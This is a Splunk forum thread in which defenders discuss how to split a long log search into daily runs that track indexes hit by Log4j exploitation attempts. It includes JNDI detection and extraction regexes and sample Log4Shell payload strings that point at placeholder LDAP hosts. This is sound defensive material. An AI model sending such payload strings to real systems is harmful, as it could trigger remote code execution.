TL;DR: I'm trying to automatically break up one large 25-day search into 25 separate one-day searches.
I'm updating a lookup table that tracks which indexes are affected by the new Log4j exploit, so that subsequent searches only have to scan the affected indexes. Updating this lookup table takes hours for each day of data. The problem is that I need to know all of the indexes affected by Log4j over every day since around December 10th.
Query that updates lookup table:
NOT [| inputlookup log4j_indexes.csv | fields index]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
Each time this query finishes, it appends Log4j-exploit-affected indexes to the lookup table. I need to automate scanning over a large timeframe (December 10th, 2021 to January 5th, 2022), but I want the lookup table to update as the search works through each day. In other words, I'm trying to break the large 25-day search into 25 separate one-day searches. This also means that if one search fails, I don't lose all progress, and I can then apply the same methodology to other searches.
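For illustration, here's what the intended split looks like outside Splunk: a small Python sketch (my own helper names, not anything Splunk provides) that cuts the December 10 to January 5 range into consecutive one-day (earliest, latest) windows, each of which would drive one independent one-day search:

```python
from datetime import datetime, timedelta

def daily_windows(start, end):
    """Split [start, end) into consecutive one-day (earliest, latest) pairs."""
    windows = []
    cursor = start
    while cursor < end:
        windows.append((cursor, cursor + timedelta(days=1)))
        cursor += timedelta(days=1)
    return windows

# One window per day; each pair maps to one search's earliest/latest.
windows = daily_windows(datetime(2021, 12, 10), datetime(2022, 1, 5))
```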
Lookup Table (Log4J_affected_indexes)
| Index   |
|---------|
| index_1 |
| index_2 |
How I've tried to solve the problem
- Commands I've tried while attempting to solve:
- foreach
- map
- gentimes
- subsearch
- saved searches
Gentimes (smaller timeframes) -> map
Explanation of Query below:
The gentimes part creates a table based on the selected timerange:
| Earliest            | Latest              |
|---------------------|---------------------|
| 01/02/2022:00:00:00 | 01/03/2022:00:00:00 |
| 01/03/2022:00:00:00 | 01/04/2022:00:00:00 |
| 01/04/2022:00:00:00 | 01/05/2022:00:00:00 |
I try to pass those values to a subsearch as the earliest and latest parameters using map. I now understand that map doesn't seem to work for this, and I get no results when the search runs.
(gentimes and map) Query:
|gentimes start=-1
|addinfo
|eval datetime=strftime(mvrange(info_min_time,info_max_time,"1d"),"%m/%d/%Y:%H:%M:%S")
|mvexpand datetime
|fields datetime
|eval latest=datetime
|eval input_earliest=strptime(datetime, "%m/%d/%Y:%H:%M:%S") - 86400
|eval earliest=strftime(input_earliest, "%m/%d/%Y:%H:%M:%S")
|fields earliest, latest
| map search="search NOT [| inputlookup log4j_indexes.csv | fields index] earliest=$earliest$ latest=$latest$
| regex _raw=\"(\$|\%24)(\{|\%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|\%3A|\$|\%24|}|\%7D)\"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv"
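The eval time math in the query above can be sanity-checked outside Splunk. Here is a rough Python equivalent of the strptime/strftime round-trip and the 86400-second subtraction, using the exact format string from the query (this assumes UTC; Splunk's strptime uses the search-time zone):

```python
import calendar
import time

FMT = "%m/%d/%Y:%H:%M:%S"  # same format string as the SPL evals

def window_from_latest(latest_str):
    """Mirror the query's evals: earliest = latest - 86400 seconds."""
    latest_epoch = calendar.timegm(time.strptime(latest_str, FMT))
    earliest_epoch = latest_epoch - 86400  # one day earlier
    return time.strftime(FMT, time.gmtime(earliest_epoch)), latest_str

earliest, latest = window_from_latest("01/03/2022:00:00:00")
```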
Gentimes subsearch -> main search
Explanation of Query below:
I use gentimes in a subsearch to produce smaller timeframes from the larger selected timeframe:
| Earliest            | Latest              |
|---------------------|---------------------|
| 01/02/2022:00:00:00 | 01/03/2022:00:00:00 |
| 01/03/2022:00:00:00 | 01/04/2022:00:00:00 |
| 01/04/2022:00:00:00 | 01/05/2022:00:00:00 |
This doesn't give me errors, but I get no matches. I can almost guarantee it isn't running a separate search per row of the table above, and I'm not sure how that can be done.
(gentimes subsearch) Query:
NOT [| inputlookup log4j_indexes.csv | fields index]
[|gentimes start=-1
|addinfo
|eval datetime=strftime(mvrange(info_min_time,info_max_time,"1d"),
"%m/%d/%Y:%H:%M:%S")
|mvexpand datetime
|fields datetime
|eval latest=datetime
|eval input_earliest=strptime(datetime,"%m/%d/%Y:%H:%M:%S") - 86400
|eval earliest=strftime(input_earliest,"%m/%d/%Y:%H:%M:%S")
|fields earliest, latest]
| regex _raw="(\$|\%24)(\{|\%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|\%3A|\$|\%24|}|\%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
Conclusion
Other failed attempts:
- using foreach (it can't run non-streaming commands)
- passing earliest and latest parameters to a saved search (savedsearch doesn't work this way)
Other solutions I've thought of:
- Running a subsearch that updates a smaller_timeframe.csv file to keep track of the smaller timeframes, then somehow passing those timeframe parameters (earliest / latest) into a search.
- Some sort of recursive search where each search triggers the next one, with the earliest and latest values incremented forward one day (or any amount of time) each step.
- Maybe Splunk has a feature (outside the search head) that can automate the same search over small timeframes across a large period of time, perhaps with scheduling built in.
If there is any other information that I can give to help others solve this with me, then just ask. I can edit this post...
The solution to breaking up a large timeframe into smaller timeframes uses macros. The macro and the search are listed below:
Search Query over 7 days (split up into 7 searches)
- Each macro call updates the lookup table and checks only the indexes that haven't already been flagged for Log4j, so the search speeds up as more indexes are found. The next step of this process is to use the same type of macro to narrow down the affected sourcetypes.
NOT [| inputlookup log4j_indexes.csv | table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"@d")
| eval earliest=latest-(24*60*60)
| eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
| eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
| table earliest latest]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=1,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=2,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=3,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=4,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=5,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=6,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=7,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| append [| inputlookup log4j_indexes.csv]
Lookup Table Updater Macro
append
[search NOT [| inputlookup $lookup_table$ | table $lookup_field$]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-$day$d@d")
| eval earliest=latest-(24*60*60)
| eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
| eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
| table earliest latest]
| $search_command$
| inputlookup append=true $lookup_table$
| dedup $lookup_field$
| outputlookup $lookup_table$]
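Since the seven macro calls differ only in their day argument, they could be generated rather than hand-typed. A small (hypothetical) Python helper that emits the SPL lines to paste in, reusing the detection regex from the post:

```python
# Detection regex copied from the post; % characters are literal here.
REGEX = r"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"

def macro_call(day, lookup="log4j_indexes.csv", field="index"):
    """Build one `lookup_updater_ultra(...)` SPL line for the given day offset."""
    cmd = 'regex _raw=\\"' + REGEX + '\\"'  # escaped quotes for the macro argument
    return ('| `lookup_updater_ultra(lookup_table="%s",lookup_field="%s",'
            'day=%d,search_command="%s")`' % (lookup, field, day, cmd))

# Seven calls, one per day, joined into a paste-ready SPL fragment.
spl = "\n".join(macro_call(d) for d in range(1, 8))
```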
- Possible Improvements:
  - Recursive macros
    - You could have an if statement within the macro that acts like a for loop and recursively calls the macro for the next day down.
    - Example: you are searching 7 days, so pass 7 as the macro's day argument. The macro then checks with eval: if day is greater than 1, call the same macro again with day-1 as the argument; otherwise stop at 1.

You could try something like this:
NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-1d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-2d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-3d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-4d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-5d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-6d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-7d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[| inputlookup indexes.csv]
Essentially, this goes back 8 days, one day at a time. You can modify the latest and earliest calculation to suit your requirement.
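For anyone checking the window math: relative_time(info_max_time, "-Nd@d") steps back N days and snaps to midnight. A rough Python equivalent of that calculation and the earliest = latest - 1 day step (assuming UTC; Splunk uses the search-time zone):

```python
from datetime import datetime, timedelta, timezone

def relative_day_window(now, n):
    """Approximate relative_time(now, "-<n>d@d") plus earliest = latest - 1 day."""
    latest = (now - timedelta(days=n)).replace(
        hour=0, minute=0, second=0, microsecond=0)  # snap back to midnight (@d)
    earliest = latest - timedelta(days=1)
    return earliest, latest

now = datetime(2022, 1, 5, 14, 30, tzinfo=timezone.utc)
earliest, latest = relative_day_window(now, 1)
```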
If you create a macro for the append parts, e.g. index_checker(1) with the argument day:
| append
[search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-$day$d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
The search can be reduced to this:
NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"
`index_checker(1)`
`index_checker(2)`
`index_checker(3)`
`index_checker(4)`
`index_checker(5)`
`index_checker(6)`
`index_checker(7)`
| append
[| inputlookup indexes.csv]
Does this mean that each day would run separately and in a certain order? Do they run at the same time? If not, which one runs first?
Also, you've given me a great idea. I might be able to nest multiple macros to solve this in a way that can be reused in other cases. 😁
- There could be opportunities to use keyword/string searches, which are orders of magnitude faster.
- Your regex could be significantly improved for efficiency.
Could you provide a few examples of the different iterations of the JNDI string that you are trying to match against?
There are hundreds of different iterations (it seems), judging by that regex's matches. The bigger issue is updating the three lookup tables I have right now (log4j_affected_indexes.csv, log4j_affected_sourcetypes.csv, and log4j_malicious_sources.csv). Log4j started showing up around December 10th, so I need to log every malicious source that I can, and then query whether there was outbound communication back to those sources. That means querying ~25 days of logs and extracting the malicious sources from them. A full 25-day search probably wouldn't go well, so breaking it up automatically into 25 searches that each take about two hours means it would run for ~3 days; then I query again to look for outbound communications.
I even wrote regex to extract those malicious sources (IP or URL) from the raw data:
(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)(?<Exploit>.*?)((\:|%3A)*?)(\/\/|%2F%2F)(((?<MaliciousSource_IP>(\d{1,3}(?:\.\d{1,3}){3}))(?:(.*?)))|(?<MaliciousSource_URL>((([\=\.\$\_\:\{\}]*?)|(%24)|(%7B)|(%7D))*?[\w\d\.]+?[\.\/\:\=]*?)+))((%7D|\}){1})
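A much-simplified sketch of the same extraction idea in Python, for readers who want to experiment outside Splunk. This is not the full pattern above (it skips the URL-encoded forms and hostname capture), and note Python spells named groups `(?P<name>...)` rather than PCRE's `(?<name>...)`; the sample string is made up:

```python
import re

# Simplified stand-in for the post's extraction: pull an IPv4 target
# out of an already-decoded jndi string.
SOURCE_RE = re.compile(r"jndi:[a-z]+://(?P<ip>\d{1,3}(?:\.\d{1,3}){3})",
                       re.IGNORECASE)

def malicious_ip(raw):
    """Return the first IPv4 callback address found, or None."""
    m = SOURCE_RE.search(raw)
    return m.group("ip") if m else None

ip = malicious_ip("GET /?q=${jndi:ldap://198.51.100.7:1389/Exploit} HTTP/1.1")
```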
Simplify your searches, and reconsider whether it's necessary to find every possible iteration of the jndi string and to check every exploit attempt.
For example, this "global" search took 4 seconds to complete against a 1 TB/day Splunk environment.
("${jndi" OR "%24%7Bjndi") earliest=-7d@d
| rex "(?<jndi_string>(\$\{jndi[^\}]*\})|(%24%7Bjndi.*%7D))"
| eval jndi_string=urldecode(jndi_string)
| table _time index sourcetype jndi_string
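Outside Splunk, the extract-and-decode step in that search looks roughly like this in Python: SPL's urldecode corresponds to urllib.parse.unquote, and the regex mirrors the two alternatives in the rex above (sample request strings are made up):

```python
import re
from urllib.parse import unquote

# Same two alternatives as the rex: a plain ${jndi...} string,
# or a URL-encoded %24%7Bjndi...%7D string.
JNDI_RE = re.compile(r"(\$\{jndi[^}]*\})|(%24%7Bjndi.*%7D)")

def extract_jndi(raw):
    """Return the decoded jndi string from a raw event, or None."""
    m = JNDI_RE.search(raw)
    return unquote(m.group(0)) if m else None

plain = extract_jndi("GET /?x=${jndi:ldap://203.0.113.9/a} HTTP/1.1")
encoded = extract_jndi("GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1")
```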
If you have a next-gen firewall, look for outbound LDAP or DNS connections.
